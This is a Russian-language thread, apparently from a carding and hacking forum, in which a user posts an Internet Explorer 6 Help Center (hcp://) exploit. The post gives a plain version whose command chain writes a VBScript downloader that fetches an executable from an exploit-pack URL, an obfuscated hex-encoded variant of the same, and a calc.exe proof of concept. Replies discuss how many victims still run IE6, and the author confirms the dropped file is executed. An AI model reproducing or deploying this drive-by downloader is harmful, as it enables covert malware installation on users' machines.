1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

HCP Exploit IE6 [2/33]

Тема в разделе "Веб-Уязвимости | Эксплуатация", создана пользователем AJ1, 27 дек 2013.

  1. TopicStarter Overlay
    AJ1

    AJ1

    Регистрация:
    19 фев 2013
    Сообщения:
    246
    Симпатии:
    351
    Старый как мир, но все еще рабочий эксплойт для IE6
    Эксплуатирует недостаточную фильтрацию параметров в Microsoft Help Center

    Грязный сабж
    Код:
    var p = "<iframe src='hcp://services/layout/contentonly?topic=file:///cmd.exe /c echo dim xHttp: Set xHttp = createobject(\"Microsoft.XMLHTTP\") > %temp%\\azk.vbs && echo dim bStrm: Set bStrm = createobject(\"Adodb.Stream\") >>%temp%\\azk.vbs && echo xHttp.Open \"GET\", \"{EXPLOITPACK_URL}\",False >>%temp%\\azk.vbs && echo xHttp.Send >>%temp%\\azk.vbs && echo with bStrm >>%temp%\\azk.vbs && echo .type = 1 >>%temp%\\azk.vbs && echo .open >>%temp%\azk.vbs && echo .write xHttp.responseBody >> %temp%\\azk.vbs && echo .savetofile \"%temp%\\xxx.exe\", 2 >>%temp%\azk.vbs && echo end with >>%temp%\\azk.vbs && %temp%\\akz.vbs'"; document.write(p);
    
    Чистый сабж
    Код:
    var _0xe7a5=["\x77\x72\x69\x74\x65","\x65\x76\x61\x6C"];function x(_0x9c3ax2){document[_0xe7a5[0]](_0x9c3ax2);} ;function j(_0x9c3ax4){window[_0xe7a5[1]](_0x9c3ax4);} ;function y(_0x9c3ax6){ return unescape(_0x9c3ax6);} ;function cXmt(dz){x(dz);}
    var _0xd835=["\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27\x68\x63\x70\x3A\x2F\x2F\x73\x65\x72\x76\x69\x63\x65\x73\x2F\x6C\x61\x79\x6F\x75\x74\x2F\x63\x6F\x6E\x74\x65\x6E\x74\x6F\x6E\x6C\x79\x3F\x74\x6F\x70\x69\x63\x3D\x66\x69\x6C\x65\x3A\x2F\x2F\x2F\x63\x6D\x64\x2E\x65\x78\x65\x20\x2F\x63\x20\x65\x63\x68\x6F\x20\x64\x69\x6D\x20\x78\x48\x74\x74\x70\x3A\x20\x53\x65\x74\x20\x78\x48\x74\x74\x70\x20\x3D\x20\x63\x72\x65\x61\x74\x65\x6F\x62\x6A\x65\x63\x74\x28\x22\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x54\x54\x50\x22\x29\x20\x3E\x20\x25\x74\x65\x6D\x70\x25\x5C\x61\x7A\x6B\x2E\x76\x62\x73\x20\x26\x26\x20\x65\x63\x68\x6F\x20\x64\x69\x6D\x20\x62\x53\x74\x72\x6D\x3A\x20\x53\x65\x74\x20\x62\x53\x74\x72\x6D\x20\x3D\x20\x63\x72\x65\x61\x74\x65\x6F\x62\x6A\x65\x63\x74\x28\x22\x41\x64\x6F\x64\x62\x2E\x53\x74\x72\x65\x61\x6D\x22\x29\x20\x3E\x3E\x25\x74\x65\x6D\x70\x25\x5C\x61\x7A\x6B\x2E\x76\x62\x73\x20\x26\x26\x20\x65\x63\x68\x6F\x20\x78\x48\x74\x74\x70\x2E\x4F\x70\x65\x6E\x20\x22\x47\x45\x54\x22\x2C\x20\x22\x7B\x45\x58\x50\x4C\x4F\x49\x54\x50\x41\x43\x4B\x5F\x55\x52\x4C\x7D\x22\x2C\x46\x61\x6C\x73\x65\x20\x3E\x3E\x25\x74\x65\x6D\x70\x25\x5C\x61\x7A\x6B\x2E\x76\x62\x73\x20\x26\x26\x20\x65\x63\x68\x6F\x20\x78\x48\x74\x74\x70\x2E\x53\x65\x6E\x64\x20\x3E\x3E\x25\x74\x65\x6D\x70\x25\x5C\x61\x7A\x6B\x2E\x76\x62\x73\x20\x26\x26\x20\x65\x63\x68\x6F\x20\x77\x69\x74\x68\x20\x62\x53\x74\x72\x6D\x20\x3E\x3E\x25\x74\x65\x6D\x70\x25\x5C\x61\x7A\x6B\x2E\x76\x62\x73\x20\x26\x26\x20\x65\x63\x68\x6F\x20\x2E\x74\x79\x70\x65\x20\x3D\x20\x31\x20\x3E\x3E\x25\x74\x65\x6D\x70\x25\x5C\x61\x7A\x6B\x2E\x76\x62\x73\x20\x26\x26\x20\x65\x63\x68\x6F\x20\x2E\x6F\x70\x65\x6E\x20\x3E\x3E\x25\x74\x65\x6D\x70\x25\x61\x7A\x6B\x2E\x76\x62\x73\x20\x26\x26\x20\x65\x63\x68\x6F\x20\x2E\x77\x72\x69\x74\x65\x20\x78\x48\x74\x74\x70\x2E\x72\x65\x73\x70\x6F\x6E\x73\x65\x42\x6F\x64\x79\x20\x3E\x3E\x20\x25\x74\x65\x6D\x70\x25\x5C\x61\x7A\x6B\x2E\x76\x62\x73\x20\x26\x26\x20\x65\x63\x68\x6F\x20\x2E\x73\x61\x76\x65\x74\x6F\x66\x69\x6C\x65\x20\x22\x25\x74\x65\x6D\x70\x25\x5C\x78\x78\x78\x2E\x65\x78\x65\x22\x2C\x20\x32\x20\x3E\x3E\x25\x74\x65\x6D\x70\x25\x61\x7A\x6B\x2E\x76\x62\x73\x20\x26\x26\x20\x65\x63\x68\x6F\x20\x65\x6E\x64\x20\x77\x69\x74\x68\x20\x3E\x3E\x25\x74\x65\x6D\x70\x25\x5C\x61\x7A\x6B\x2E\x76\x62\x73\x20\x26\x26\x20\x25\x74\x65\x6D\x70\x25\x5C\x61\x6B\x7A\x2E\x76\x62\x73\x27"];var p=_0xd835[0]; cXmt(y(p));
    
    PoC
    Код:
    document.write("<iframe src='hcp://services/layout/contentonly?topic=file:///calc.exe'></iframe>");
    
     
    • Like Like x 2
    Метки:
  2. grs101

    grs101

    Регистрация:
    30 сен 2012
    Сообщения:
    286
    Симпатии:
    262
    у кого то еще есть IE6
     
    • Like Like x 1
  3. TopicStarter Overlay
    AJ1

    AJ1

    Регистрация:
    19 фев 2013
    Сообщения:
    246
    Симпатии:
    351

    Статистика за этот год
    [​IMG]

    А теперь представь, сколько из IE сидит с ХР, где осел 6 - по умолчанию
     
  4. NANOTECH

    NANOTECH

    Регистрация:
    11 дек 2012
    Сообщения:
    150
    Симпатии:
    69
    эта часть кода только скачивает файлы ? не запускает?
     
    • Like Like x 1
  5. TopicStarter Overlay
    AJ1

    AJ1

    Регистрация:
    19 фев 2013
    Сообщения:
    246
    Симпатии:
    351
    запускает
     

Поделиться этой страницей

Загрузка...